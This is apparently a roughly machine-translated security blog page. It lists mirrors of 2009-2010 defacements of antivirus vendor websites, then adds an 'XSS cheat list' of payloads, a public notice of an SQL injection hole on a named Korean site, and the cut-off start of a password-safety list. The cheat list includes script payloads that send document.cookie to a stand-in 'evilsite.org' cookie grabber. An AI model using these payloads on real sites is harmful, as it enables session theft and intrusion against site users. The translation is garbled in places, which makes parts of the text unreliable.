Last month, eight sites at once well-known anti-virus solutions avast!  Were defaces:

http://2.bp.blogspot.com/_eY5lQb30XpY/S4Ac8e9asZI/AAAAAAAAAuk/5dXk9I3GQPk/s320/deface_avast.jpg

http://www.avast.co.za/ (mirror; date: 2010-01-22 15:06:28)
http://awast.org/ (mirror; date: 2010-02-18 18:57:27)
http://www.avast.de/ (mirror; date: 2010-02-18 18:58:01)
http://shop.avast.de/ (mirror; date: 2010-02-18 18:58:24)
http://www2.avast.de/ (mirror; date: 2010-02-18 18:59:51)
http://partner.avast.de/ (mirror; date: 2010-02-18 19:03:59)
http://demoshop.avast.de/ (mirror; date: 2010-02-18 19:03:14)
http://forum.avast.de/ (mirror; date: 2010-02-18 19:01:33)

Breaking these sites was done by a group of hackers “HcJ & Cyb3R-1sT”, on account of which a successful break sites and other equally popular antivirus vendors:

ESET

https: / / www.eset-antivirus.de/ (mirror; date: 2009-12-21 00:35:55)
https: / / www.datsec.de/ (mirror; date: 2009-12-20 22:50:05)
https: / / www.esetantivirus.de/ (mirror; date: 2009-12-21 00:32:02)
http://www.eset.de/ (mirror; date: 2009-12-20 22:47:52)
https: / / www.esetsoftware.de/ (mirror; date: 2009-12-18 00:22:21)
https: / / www.nod32.de/ (mirror; date: 2009-12-18 00:21:24)
http://getnod32.com/ (mirror; date: 2009-12-12 00:47:18)
http://nod-32.eu/ (mirror; date: 2009-11-30 01:48:52)
http://partners.nod32.bg/ (mirror; date: 2009-10-04 01:52:36)

Panda Security

http://duvidas.pandasecurity.com.br/ (mirror; date: 2009-12-13 11:43:54)
http://download.pandasecurity.com.br/ (mirror; date: 2009-12-10 20:56:17)
http://press.pandasecurity.com.br/ (mirror; date: 2009-12-10 20:56:38)
http://intranet.pandasecurity.com.br/ (mirror; date: 2009-12-10 20:57:11)

F-Secure

http://ativacao.f-secure.com.br/ (mirror; date: 2009-12-23 14:21:20)
http://fsecure.com.br/ (mirror; date: 2009-12-23 14:48:51)
http://f-secure.com.br/ (mirror; date: 2009-12-13 21:28:12)

bitdefender

http://www.bitdefenderthailand.com/ (mirror; date: 2009-12-26 02:45:15)
http://bitnet.com.hr/ (mirror; date: 2009-12-09 23:26:53)

Avast (additionally:))

http://avast.se/ (mirror; date: 2009-12-10 15:38:19)

After walking on mirrors defaces start involuntarily thinking, and whether it is worth trusting distribution antivirus solutions have just downloaded from the official site of the manufacturer? But back to the topic of fasting.

It was interesting to know, the adequacy (and efficiency) of protective measures taken after the incidents occurred on the sites of avast!.So, armed with the most advanced hacker tool called a browser, I made the transition to the site www.avast.co.za (first in the list) and …

This time is more than sufficient to detect and eliminate the most dangerous and common vulnerabilities Web.  But as we see not all are ready to learn from the first time …

Source: www.zone-h.org

Explore More

XSS Cheat List

<script>alert(1);</script> <script>alert('XSS');</script> <script src="http://www.evilsite.org/cookiegrabber.php"></script> <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script> <scr<script>ipt>alert('XSS');</scr</script>ipt> <script>alert(String.fromCharCode(88,83,83))</script> <img src=foo.png onerror=alert(/xssed/) /> <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> <marquee><script>alert('XSS')</script></marquee> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> "><script>alert(0)</script> <script src=http://yoursite.com/your_files.js></script> </title><script>alert(/xss/)</script> </textarea><script>alert(/xss/)</script>

Security Alert to www.mtv.co.kr, MySQL Injection

Hi, http://www.mtv.co.kr Webmaster This is PlanetCreator’s Security Te@am & Hackers Group, PlanetCreator has reported Critical SQL Injection vulnerability on http://www.mtv.co.kr/ Website. Informed to [email protected] Some of your Web’s Data Information

10 steps you can take to improve your online security

1. Ensure that you login to an official site * Ensure that you login to an official site (eg. http://www.planetcreator.net) 2. Choose passwords that are hard to guess. Avoid using